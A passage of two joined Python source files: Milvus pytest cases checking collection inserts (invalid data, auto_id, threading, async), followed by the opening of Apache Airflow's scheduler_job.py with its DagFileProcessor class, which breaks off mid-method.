error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=get_non_data_type, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("data", [[], pd.DataFrame()])
def test_insert_empty_data(self, data):
"""
target: test insert empty data
method: insert empty
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "The data fields number is not match with schema"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_only_columns(self):
"""
target: test insert with dataframe just columns
method: dataframe just have columns
expected: num entities is zero
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_empty_field_name_dataframe(self):
"""
target: test insert empty field name df
method: dataframe with empty column
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: ' '}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_invalid_field_name_dataframe(self, get_invalid_field_name):
"""
target: test insert with invalid dataframe data
method: insert with invalid field name dataframe
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: get_invalid_field_name}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
def test_insert_dataframe_index(self):
"""
target: test insert dataframe with index
method: insert dataframe with index
expected: todo
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_insert_none(self):
"""
target: test insert None
method: data is None
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
mutation_res, _ = collection_w.insert(data=None)
assert mutation_res.insert_count == 0
assert len(mutation_res.primary_keys) == 0
assert collection_w.is_empty
assert collection_w.num_entities == 0
@pytest.mark.tags(CaseLabel.L1)
def test_insert_numpy_data(self):
"""
target: test insert numpy.ndarray data
method: 1.create by schema 2.insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_numpy_data(nb=10)
error = {ct.err_code: 0, ct.err_msg: "Data type not support numpy.ndarray"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_dataframe(self):
"""
target: test insert binary dataframe
method: 1. create by schema 2. insert dataframe
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_data(self):
"""
target: test insert list-like binary data
method: 1. create by schema 2. insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
data, _ = cf.gen_default_binary_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_single(self):
"""
target: test insert single
method: insert one entity
expected: verify num
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=1)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == 1
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_insert_dim_not_match(self):
"""
target: test insert with not match dim
method: insert data dim not equal to schema dim
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
dim = 129
df = cf.gen_default_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_insert_binary_dim_not_match(self):
"""
target: test insert binary with dim not match
method: insert binary data dim not equal to schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
dim = 120
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_field_name_not_match(self):
"""
target: test insert field name not match
method: data field name not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_float_field_name: "int"}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_field_value_not_match(self):
"""
target: test insert data value not match
method: insert data value type not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 1] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_value_less(self):
"""
target: test insert value less than other
method: int field value less than vec-field value
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb - 1)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_vector_value_less(self):
"""
target: test insert vector value less than other
method: vec field value less than int field
expected: todo
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb - 1, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_fields_more(self):
"""
target: test insert with fields more
method: field more than schema fields
expected: todo
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
new_values = [i for i in range(ct.default_nb)]
df.insert(3, 'new', new_values)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_fields_less(self):
"""
target: test insert with fields less
method: fields less than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_float_vec_field_name, axis=1, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_list_order_inconsistent_schema(self):
"""
target: test insert data fields order inconsistent with schema
method: insert list data, data fields order inconsistent with schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [float_values, int_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_order_inconsistent_schema(self):
"""
target: test insert with dataframe fields inconsistent with schema
method: insert dataframe, and fields order inconsistent with schema
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = pd.Series(data=[i for i in range(nb)])
float_values = pd.Series(data=[float(i) for i in range(nb)], dtype="float32")
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
df = pd.DataFrame({
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values,
ct.default_int64_field_name: int_values
})
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_inconsistent_data(self):
"""
target: test insert with inconsistent data
method: insert with data that same field has different type data
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=100)
data[0][1] = 1.0
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
collection_w.insert(data, check_task=CheckTasks.err_res, check_items=error)
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_without_connection(self):
"""
target: test insert without connection
method: insert after remove connection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
data = cf.gen_default_list_data(10)
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.parametrize("vec_fields", [[cf.gen_float_vec_field(name="float_vector1")],
[cf.gen_binary_vec_field()],
[cf.gen_binary_vec_field(), cf.gen_binary_vec_field("binary_vec")]])
def test_insert_multi_float_vec_fields(self, vec_fields):
"""
target: test insert into multi float vec fields collection
method: create collection and insert
expected: verify num entities
"""
schema = cf.gen_schema_multi_vector_fields(vec_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_vec_fields(vec_fields=vec_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_drop_collection(self):
"""
target: test insert and drop
method: insert data and drop collection
expected: verify collection if exist
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name in collection_list
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
collection_w.drop()
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name not in collection_list
@pytest.mark.tags(CaseLabel.L1)
def test_insert_create_index(self):
"""
target: test insert and create index
method: 1. insert 2. create index
expected: verify num entities and index
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_after_create_index(self):
"""
target: test insert after create index
method: 1. create index 2. insert data
expected: verify index and num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_after_index(self):
"""
target: test insert binary after index
method: 1.create index 2.insert binary data
expected: 1.index ok 2.num entities correct
"""
schema = cf.gen_default_binary_collection_schema()
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.indexes[0] == index
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_create_index(self):
"""
target: test create index in auto_id=True collection
method: 1.create auto_id=True collection and insert 2.create index
expected: index correct
"""
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert without ids
expected: verify primary_keys and num_entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_twice_auto_id_true(self):
"""
target: test insert ids fields twice when auto_id=True
method: 1.create collection with auto_id=True 2.insert twice
expected: verify primary_keys unique
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
nb = 10
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
primary_keys = mutation_res.primary_keys
assert cf._check_primary_keys(primary_keys, nb)
mutation_res_1, _ = collection_w.insert(data=df)
primary_keys.extend(mutation_res_1.primary_keys)
assert cf._check_primary_keys(primary_keys, nb * 2)
assert collection_w.num_entities == nb * 2
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_list_data(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert list data with ids field values
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=data[1:])
assert mutation_res.insert_count == ct.default_nb
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_dataframe_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'Auto_id is True, primary field should not have data'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_list_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_same_values(self):
"""
target: test insert same ids with auto_id false
method: 1.create collection with auto_id=False 2.insert same int64 field values
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb=nb)
data[0] = [1 for i in range(nb)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == data[0]
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_negative_values(self):
"""
target: test insert negative ids with auto_id false
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb)
data[0] = [i for i in range(0, -nb, -1)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_multi_threading(self):
"""
target: test concurrent insert
method: multi threads insert
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
thread_num = 4
threads = []
primary_keys = df[ct.default_int64_field_name].values.tolist()
def insert(thread_i):
log.debug(f'In thread-{thread_i}')
mutation_res, _ = collection_w.insert(df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == primary_keys
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for t in threads:
t.join()
assert collection_w.num_entities == ct.default_nb * thread_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="Currently primary keys are not unique")
def test_insert_multi_threading_auto_id(self):
"""
target: test concurrent insert auto_id=True collection
method: 1.create auto_id=True collection 2.concurrent insert
expected: verify primary keys unique
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_insert_multi_times(self):
"""
target: test insert multi times
method: insert data multi times
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
step = 120
for _ in range(ct.default_nb // step):
df = cf.gen_default_dataframe_data(step)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == step
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_all_datatype_collection(self):
"""
target: test insert into collection that contains all datatype fields
method: 1.create all datatype collection 2.insert data
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_dataframe_all_data_type(nb=nb)
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name)
assert self.collection_wrap.num_entities == nb
class TestInsertAsync(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert async
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_sync(self):
"""
target: test async insert
method: insert with async=True
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_false(self):
"""
target: test insert with false async
method: async = false
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=df, _async=False)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_callback(self):
"""
target: test insert with callback func
method: insert with callback func
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result)
future.done()
mutation_res = future.result()
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self):
"""
target: test insert with async
method: insert 5w entities with callback func
expected: verify num entities
"""
nb = 50000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self):
"""
target: test insert async with callback
method: insert 10w entities with timeout=1
expected: raise exception
"""
nb = 100000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result, timeout=1)
with pytest.raises(Exception):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_data(self):
"""
target: test insert async with invalid data
method: insert async with invalid data
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_partition(self):
"""
target: test insert async with invalid partition
method: insert async with invalid partition
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
err_msg = "partitionID of partitionName:p can not be find"
future, _ = collection_w.insert(data=df, partition_name="p", _async=True)
future.done()
with pytest.raises(Exception, match=err_msg):
future.result()
def assert_mutation_result(mutation_res):
assert mutation_res.insert_count == ct.default_nb
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULEABLE_STATES, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
